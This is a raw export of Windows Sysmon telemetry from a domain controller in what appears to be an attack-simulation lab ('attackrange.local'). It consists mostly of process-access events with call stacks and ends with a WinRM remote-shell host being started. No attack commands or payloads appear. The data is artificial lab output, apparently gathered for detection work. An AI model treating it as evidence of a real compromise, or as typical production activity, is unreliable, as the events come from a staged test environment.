12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000889Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000888Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000887Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}81196C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000886Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000885Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}81196C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000884Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}81196C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000883Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+5d917|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000882Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}81196C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000881Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}81196C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000880Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000879Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}81196C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000878Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000877Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.655{266CAFBE-6444-6064-EB02-00000000AD01}44364852C:\Windows\system32\conhost.exe{266CAFBE-6444-6064-EA02-00000000AD01}3812C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000876Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.655{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-6444-6064-EB02-00000000AD01}4436C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000875Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.655{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000874Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.655{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000873Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.655{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000872Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.639{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000871Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.639{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000870Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.639{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000869Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.639{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000868Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.639{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000867Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.639{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000866Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.639{266CAFBE-62C8-6064-0500-00000000AD01}620636C:\Windows\system32\csrss.exe{266CAFBE-6444-6064-EA02-00000000AD01}3812C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000865Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.639{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6444-6064-EA02-00000000AD01}3812C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000864Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.653{266CAFBE-6444-6064-EA02-00000000AD01}3812C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe 